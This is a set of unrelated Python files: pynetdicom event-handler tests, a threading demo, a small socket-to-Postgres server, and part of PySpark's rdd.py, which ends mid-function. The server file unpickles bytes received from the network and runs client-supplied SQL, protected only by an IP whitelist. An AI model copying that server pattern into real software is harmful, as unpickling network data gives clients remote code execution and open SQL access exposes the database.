assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.release()
scp.shutdown()
def test_acse_sent(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo()
assoc.abort()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_ABORT)
scp.shutdown()
def test_acse_sent_ap_abort(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.acse.send_ap_abort(0x00)
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_P_ABORT)
scp.shutdown()
def test_acse_sent_bind(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112)
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.is_established
assoc.send_c_echo(msg_id=12)
assoc.bind(evt.EVT_ACSE_SENT, handle)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_RELEASE)
scp.shutdown()
def test_acse_sent_unbind(self):
"""Test unbinding EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assoc.send_c_echo(msg_id=12)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.unbind(evt.EVT_ACSE_SENT, handle)
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
scp.shutdown()
def test_acse_sent_raises(self, caplog):
"""Test the handler for EVT_ACSE_SENT raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_ACSE_SENT' event handler"
" 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
def test_acse_recv(self):
"""Test starting bound to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_RELEASE)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_ap_abort(self):
"""Test A-P-ABORT with EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_requested_context(Verification)
ae.add_supported_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False)
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
child = scp.active_associations[0]
child.acse.send_abort(0x02)
while scp.active_associations:
time.sleep(0.05)
assert assoc.is_aborted
assert len(triggered) == 2
event = triggered[1]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[1].primitive, A_P_ABORT)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_bind(self):
"""Test binding to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo(msg_id=12)
assoc.bind(evt.EVT_ACSE_RECV, handle)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo(msg_id=21)
assoc.abort()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 0
scp.shutdown()
def test_acse_recv_unbind(self):
"""Test unbinding to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc.send_c_echo(msg_id=12)
assoc.unbind(evt.EVT_ACSE_RECV, handle)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_raises(self, caplog):
"""Test the handler for EVT_ACSE_RECV raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_ACSE_RECV' event handler"
" 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
|
threading_setDeamon.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:Lyon
import threading
import time
def run(name):
print("I am %s" % name)
time.sleep(2)
print("When I'm done, I'm going to keep talking...")
if __name__ == '__main__':
lyon = threading.Thread(target=run, args=('Lyon',))
kenneth = threading.Thread(target=run, args=('Kenneth',))
lyon.setDaemon(True)
lyon.start()
kenneth.setDaemon(True)
kenneth.start()
time.sleep(5)
print("I was the main thread, and I ended up executing")
|
server.py
|
import socket
import pickle
import threading
from psycopg2 import connect
from dotenv import load_dotenv
from os import environ
# Client -> Server: Fixed + Custom Size (SQL arguments are unknown)
HEADER_FIX_SIZE = 2
# Server -> Client: Fixed Size, no SQL arguments
HEADER_FEEDBACK_SIZE = 5
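# Request wire format, sketched from how handle_data() below parses it (an
# informal summary, not a separate spec):
#   bytes 0-1    : ASCII integer N, the length of the pickled size list
#   bytes 2-2+N  : pickle of [len(query_bytes)] or [len(query_bytes), len(args_bytes)]
#   remainder    : pickled SQL text, optionally followed by pickled SQL arguments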
BUFFER = 1024
APP_IP = ""
APP_PORT = 1248
FORMAT = "utf-8"
whitelist = []
desc_list = []
db_connector = None
db_cursor = None
# setting up the database
def connect_to_database():
global db_cursor, db_connector
try:
print("Trying to get .env data...")
load_dotenv()
database_url = environ.get("HEROKU_POSTGRESQL_BLUE_URL")
password_db = environ.get("password_db")
user_db = environ.get("user_db")
name_db = environ.get("name_db")
port_db = environ.get("port_db")
db_connector = connect(str(database_url), user=str(user_db), port=port_db, dbname=str(name_db),
password=str(password_db))
db_cursor = db_connector.cursor()
except Exception as e:  # failures in load_dotenv() or connect() should also abort start-up
print(f"ERROR: {e}. The program will be terminated.")
exit()
else:
print("Loaded .env from the system path.")
# Functions
def update_whitelist():
global whitelist, desc_list
db_cursor.execute("SELECT ip, description FROM ew_ips")
whitelist, desc_list = zip(*db_cursor.fetchall())
def update_ip():
global APP_IP
hostname = socket.gethostname()
APP_IP = socket.gethostbyname(hostname)
print(f"debug ip: {APP_IP}")
def handle_data(client_socket, address):
try:
idx = whitelist.index(address[0])  # address is a (host, port) tuple; the whitelist stores bare IP strings
except ValueError:
client_socket.sendall(bytes("Access was denied. Contact with the creator of the tool for help.", FORMAT))
client_socket.close()
return
else:
print(f"Connection from {address} aka {desc_list[idx]} has been established")
full_data = b""
new_msg = True
msg_len = -1
header_custom_size = 0 # placeholder value
headers_sizes = [] # list of integers, data + SQL args if relevant
# getting the data
while True:
p_data = client_socket.recv(BUFFER) # bytes type
# handling the header
if new_msg:
header_custom_size = int(p_data[:HEADER_FIX_SIZE].decode(FORMAT)) # int, constant
headers_sizes = pickle.loads(p_data[HEADER_FIX_SIZE:HEADER_FIX_SIZE + header_custom_size]) # a list
if len(headers_sizes) == 2:
msg_len = sum(headers_sizes)
else:
msg_len = headers_sizes[0]
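# Worked example: a 120-byte pickled query plus 35 bytes of pickled arguments
# arrives as headers_sizes == [120, 35], so msg_len becomes 155 and exactly
# that many payload bytes are expected after the two headers.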
# checking for the end
if len(p_data) <= 0:
if len(full_data) - (HEADER_FIX_SIZE + header_custom_size) == msg_len:
print("Transfer succeeded")
elif len(full_data) - (HEADER_FIX_SIZE + header_custom_size) > msg_len:
print(f"ERROR: Incorrect header setting, received data too long.\n"
f"Custom size: {header_custom_size} for value: {headers_sizes}\n"
f"String of the data: {pickle.loads(full_data)}")
client_socket.close()
return
else:
print(f"ERROR: Received data too short, possible connection issue or incorrect header setting.\n"
f"Custom size: {header_custom_size} for value: {headers_sizes}\n"
f"String of the data: {pickle.loads(full_data)}")
client_socket.close()
return
break
# removing the header, accumulating the data
if new_msg:
full_data = p_data[HEADER_FIX_SIZE + header_custom_size:]
new_msg = False
else:
full_data += p_data
# Preparing and using the data
if len(headers_sizes) == 2:
sql_request = pickle.loads(full_data[:headers_sizes[0]])
sql_arguments = pickle.loads(full_data[headers_sizes[0]:])
else:
sql_request = pickle.loads(full_data)
sql_arguments = None  # no bound parameters were sent with this request
# taking requested data from the database
db_cursor.execute(sql_request, sql_arguments)
db_data = db_cursor.fetchall()
# serialising and sending back
ser_data = pickle.dumps(db_data)
client_socket.sendall(bytes(f"{len(db_data):<{HEADER_FEEDBACK_SIZE}}", FORMAT)+ser_data)
client_socket.close()
def main_loop():
# setting up connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)  # allow rebinding the address immediately after a restart
s.bind((APP_IP, APP_PORT))
s.listen(5)
while True:
conn, address = s.accept()
thread = threading.Thread(target=handle_data, args=(conn, address))
thread.start()
# getting things started
connect_to_database()
update_whitelist()
update_ip()
main_loop()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import AutoBatchedSerializer, BatchedSerializer, NoOpSerializer, \
CartesianDeserializer, CloudPickleSerializer, PairDeserializer, PickleSerializer, \
UTF8Deserializer, pack_long, read_int, write_int
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
SQL_GROUPED_AGG_PANDAS_UDF = 202
SQL_WINDOW_AGG_PANDAS_UDF = 203
SQL_SCALAR_PANDAS_ITER_UDF = 204
SQL_MAP_PANDAS_ITER_UDF = 205
def portable_hash(x):
"""
This function returns a consistent hash code for builtin types, especially
for None and for tuples containing None.
The algorithm is similar to the one used by CPython 2.7.
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _create_local_socket(sock_info):
"""
Create a local socket that can be used to load deserialized data from the JVM
:param sock_info: Tuple containing port number and authentication secret for a local socket.
:return: sockfile file descriptor of the local socket
"""
port = sock_info[0]
auth_secret = sock_info[1]
sockfile, sock = local_connect_and_auth(port, auth_secret)
# The RDD materialization time is unpredictable; if we set a timeout on the socket read
# operation, it is very likely to fail. See SPARK-18281.
sock.settimeout(None)
return sockfile
def _load_from_socket(sock_info, serializer):
"""
Connect to a local socket described by sock_info and use the given serializer to yield data
:param sock_info: Tuple containing port number and authentication secret for a local socket.
:param serializer: The PySpark serializer to use
:return: result of Serializer.load_stream, usually a generator that yields deserialized data
"""
sockfile = _create_local_socket(sock_info)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def _local_iterator_from_socket(sock_info, serializer):
class PyLocalIterable(object):
""" Create a synchronous local iterable over a socket """
def __init__(self, _sock_info, _serializer):
port, auth_secret, self.jsocket_auth_server = _sock_info
self._sockfile = _create_local_socket((port, auth_secret))
self._serializer = _serializer
self._read_iter = iter([]) # Initialize as empty iterator
self._read_status = 1
def __iter__(self):
while self._read_status == 1:
# Request next partition data from Java
write_int(1, self._sockfile)
self._sockfile.flush()
# If response is 1 then there is a partition to read, if 0 then fully consumed
self._read_status = read_int(self._sockfile)
if self._read_status == 1:
# Load the partition data as a stream and read each item
self._read_iter = self._serializer.load_stream(self._sockfile)
for item in self._read_iter:
yield item
# An error occurred, join serving thread and raise any exceptions from the JVM
elif self._read_status == -1:
self.jsocket_auth_server.getResult()
def __del__(self):
# If local iterator is not fully consumed,
if self._read_status == 1:
try:
# Finish consuming partition data stream
for _ in self._read_iter:
pass
# Tell Java to stop sending data and close connection
write_int(0, self._sockfile)
self._sockfile.flush()
except Exception:
# Ignore any errors, socket is automatically closed when garbage-collected
pass
return iter(PyLocalIterable(sock_info, serializer))
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of strings in doctests, so that the examples work
in both Python 2 and 3.
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The :class:`SparkContext` that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (`MEMORY_ONLY`).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified, this defaults to (`MEMORY_ONLY`).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self, blocking=False):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
.. versionchanged:: 3.0.0
Added optional argument `blocking` to specify whether to block until all
blocks are deleted.
"""
self.is_cached = False
self._jrdd.unpersist(blocking)
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with :meth:`SparkContext.setCheckpointDir` and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
`spark.dynamicAllocation.cachedExecutorIdleTimeout` to a high value.
The checkpoint directory set through :meth:`SparkContext.setCheckpointDir` is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
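# Illustrative note: cweights holds the normalized cumulative weights, e.g. weights=[2, 3]
# become [0.0, 0.4, 1.0]. Each split keeps the rows whose per-element random draw falls in
# its [lower, upper) slice; the same seed is passed to every sampler, so the splits are
# disjoint and together cover the whole RDD.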
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
